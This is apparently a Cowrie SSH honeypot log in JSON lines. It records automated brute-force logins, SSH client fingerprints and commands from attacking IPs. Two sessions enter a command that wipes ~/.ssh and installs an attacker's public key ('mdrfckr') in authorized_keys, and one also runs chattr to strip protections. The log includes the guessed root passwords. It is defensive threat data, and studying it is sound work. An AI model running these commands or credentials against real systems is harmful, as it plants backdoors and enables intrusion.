{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.041988Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.239799Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.240792Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.session.connect","src_ip":"58.33.58.37","src_port":36204,"dst_ip":"1.2.3.4","dst_port":22,"session":"bab5dc6e2991","protocol":"ssh","message":"New connection: 58.33.58.37:36204 (1.2.3.4:22) [session: bab5dc6e2991]","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.416207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.417076Z","src_ip":"58.33.58.37","session":"bab5dc6e2991"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:52:34.606712Z","src_ip":"58.33.58.37","session":"bab5dc6e2991"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:52:35.390573Z","src_ip":"58.33.58.37","session":"bab5dc6e2991"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:36.581094Z","src_ip":"58.33.58.37","session":"bab5dc6e2991"}
{"eventid":"cowrie.session.connect","src_ip":"58.33.58.37","src_port":36780,"dst_ip":"1.2.3.4","dst_port":22,"session":"d755787b8e5c","protocol":"ssh","message":"New connection: 58.33.58.37:36780 (1.2.3.4:22) [session: d755787b8e5c]","sensor":"my-vps","timestamp":"2025-08-28T14:52:36.785396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:52:36.786448Z","src_ip":"58.33.58.37","session":"d755787b8e5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:52:36.986130Z","src_ip":"58.33.58.37","session":"d755787b8e5c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:52:37.811304Z","src_ip":"58.33.58.37","session":"d755787b8e5c"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:38.008203Z","src_ip":"58.33.58.37","session":"d0011b0ef315"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:52:38.009250Z","src_ip":"58.33.58.37","session":"d755787b8e5c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56128,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0c03d8e7f27","protocol":"ssh","message":"New connection: 217.72.205.35:56128 (1.2.3.4:22) [session: b0c03d8e7f27]","sensor":"my-vps","timestamp":"2025-08-28T14:53:04.344316Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:04.345723Z","src_ip":"217.72.205.35","session":"b0c03d8e7f27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":4202,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a46b9da1098","protocol":"ssh","message":"New connection: 212.227.125.160:4202 (1.2.3.4:22) [session: 5a46b9da1098]","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.271636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.272670Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.352425Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.session.connect","src_ip":"209.38.226.254","src_port":52382,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c1c2cc617f0","protocol":"ssh","message":"New connection: 209.38.226.254:52382 (1.2.3.4:22) [session: 4c1c2cc617f0]","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.419462Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.420139Z","src_ip":"209.38.226.254","session":"4c1c2cc617f0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.444038Z","src_ip":"209.38.226.254","session":"4c1c2cc617f0"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:06.762851Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abc123","message":"login attempt [nexus/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:07.848682Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abcd123","message":"login attempt [nexus/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:08.930966Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38632,"dst_ip":"1.2.3.4","dst_port":22,"session":"c00e1943cc66","protocol":"ssh","message":"New connection: 212.227.235.229:38632 (1.2.3.4:22) [session: c00e1943cc66]","sensor":"my-vps","timestamp":"2025-08-28T14:53:09.597058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:53:09.597808Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:53:09.784577Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abcd1234","message":"login attempt [nexus/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:10.012293Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#123QWEqwe","message":"login attempt [root/!@#123QWEqwe] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:53:10.572706Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:53:10.961626Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:53:10.962317Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T14:53:10.963703Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"abc1234","message":"login attempt [nexus/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:11.093608Z","src_ip":"212.227.125.160","session":"5a46b9da1098"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:11.151436Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:53:12.045378Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.046085Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.234534Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.235466Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39502,"dst_ip":"1.2.3.4","dst_port":22,"session":"201c011d0039","protocol":"ssh","message":"New connection: 212.227.235.229:39502 (1.2.3.4:22) [session: 201c011d0039]","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.412318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.413018Z","src_ip":"212.227.235.229","session":"201c011d0039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:53:12.592192Z","src_ip":"212.227.235.229","session":"201c011d0039"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T14:53:13.350757Z","src_ip":"212.227.235.229","session":"201c011d0039"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:14.420674Z","src_ip":"209.38.226.254","session":"4c1c2cc617f0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:14.532381Z","src_ip":"212.227.235.229","session":"201c011d0039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40534,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccf80559ba1","protocol":"ssh","message":"New connection: 212.227.235.229:40534 (1.2.3.4:22) [session: bccf80559ba1]","sensor":"my-vps","timestamp":"2025-08-28T14:53:14.721363Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T14:53:14.722318Z","src_ip":"212.227.235.229","session":"bccf80559ba1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T14:53:14.910367Z","src_ip":"212.227.235.229","session":"bccf80559ba1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:53:15.703570Z","src_ip":"212.227.235.229","session":"bccf80559ba1"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:15.892692Z","src_ip":"212.227.235.229","session":"c00e1943cc66"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:15.893878Z","src_ip":"212.227.235.229","session":"bccf80559ba1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:53:29.954101Z","src_ip":"212.227.235.229","session":"0269f750fc1b"}
